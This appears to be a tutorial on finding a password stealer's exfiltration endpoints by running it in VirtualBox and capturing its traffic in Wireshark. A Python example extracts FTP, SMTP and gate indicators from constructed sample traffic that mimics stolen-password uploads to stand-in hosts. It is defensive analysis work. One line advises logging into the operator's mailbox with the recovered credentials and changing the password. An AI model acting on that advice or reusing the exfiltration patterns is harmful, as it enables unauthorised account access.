We will find the gate, FTP and e-mail settings that are configured in an existing stealer build.
We need:
- Build stealer
- Wireshark
- VirtualBox
1. The first thing to do is kill all processes that use the network, so it will be easier to find the data you need.
2. Run Wireshark and select the interface to sniff: Capture -> Interfaces. Choose the one in use, it will have the largest number in the Packets column. Click "Start" to begin sniffing.
3. Run the stealer build (only inside VirtualBox, nowhere else!) and monitor its execution in Process Explorer until it finishes.
4. Go to Wireshark and click Capture -> Stop to finish sniffing. We now have a dump of the network activity of the whole system for the time the stealer build was running. It remains to find the data we need.
FTP:
First, let's try to detect an FTP server, in case the stealer sends its password report that way.
Go to Wireshark, type the word "ftp" into the filter field and press "Enter":
We see the packets sent over FTP:
(In the picture, the FTP host, username and password are highlighted)
Gate:
Let's try to catch the gate address. Remove "ftp" from the filter line and look for the packet the stealer sends next. Press Ctrl + F to open the search window. Choose string search (Find by: String), type "UFR" into the search field and leave the rest at the defaults. If the build sends the passwords to a gate, something should be found.
Email:
For this, try typing the string "smtp" into the filter field, and we see this:
Decode the username and password of the mail sender using this
Log in to the mailbox and change the password.
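The same three checks (FTP USER/PASS, the SMTP AUTH LOGIN base64 pair, and the "UFR" marker in an HTTP POST to the gate) can be run over text exported from Wireshark's Follow TCP Stream, so the exfiltration endpoints end up as recorded indicators rather than screenshots. This is an added example, not code from the original post; the IP addresses, hostnames, paths and credentials in SAMPLE_STREAMS are constructed.

```python
import base64

# Constructed sample: three client->server TCP payloads as they would appear in
# Wireshark "Follow TCP Stream" after running the build inside the VM.
# Hosts, paths and credentials below are made up for this example.
SAMPLE_STREAMS = [
    ("203.0.113.10", 21,
     "USER report_drop\r\nPASS s3cret-ftp\r\nSTOR UFR_report.txt\r\n"),
    ("198.51.100.25", 25,
     "EHLO victim-pc\r\nAUTH LOGIN\r\n"
     + base64.b64encode(b"dropbox@example.net").decode() + "\r\n"
     + base64.b64encode(b"mailpass123").decode() + "\r\n"
     "MAIL FROM:<dropbox@example.net>\r\n"),
    ("192.0.2.77", 80,
     "POST /panel/gate.php HTTP/1.1\r\nHost: stealer-gate.example\r\n"
     "Content-Length: 42\r\n\r\nUFR|victim-pc|passwords.txt|..."),
]

def extract_exfil_indicators(streams):
    """Return the exfiltration endpoints found in client->server payloads.

    Mirrors the manual Wireshark steps: the 'ftp' filter (USER/PASS lines),
    the 'smtp' filter (AUTH LOGIN followed by two base64 lines) and the
    string search for the report marker 'UFR' inside an HTTP POST body.
    """
    found = {"ftp": None, "smtp": None, "gate": None}
    for dst_ip, dst_port, payload in streams:
        lines = payload.split("\r\n")
        if dst_port == 21:
            user = next((l[5:] for l in lines if l.startswith("USER ")), None)
            pw = next((l[5:] for l in lines if l.startswith("PASS ")), None)
            found["ftp"] = {"host": dst_ip, "user": user, "password": pw}
        elif dst_port == 25 and "AUTH LOGIN" in lines:
            i = lines.index("AUTH LOGIN")
            # AUTH LOGIN sends the username, then the password, each base64-encoded
            user, pw = (base64.b64decode(x).decode() for x in lines[i + 1:i + 3])
            found["smtp"] = {"host": dst_ip, "user": user, "password": pw}
        elif lines[0].startswith("POST ") and "UFR" in payload:
            host = next((l[6:] for l in lines if l.startswith("Host: ")), dst_ip)
            found["gate"] = {"host": host, "path": lines[0].split()[1]}
    return found

if __name__ == "__main__":
    for proto, info in extract_exfil_indicators(SAMPLE_STREAMS).items():
        print(proto, info)
```

The returned hosts and paths are what goes into a blocklist or an abuse report to the hosting and mail providers.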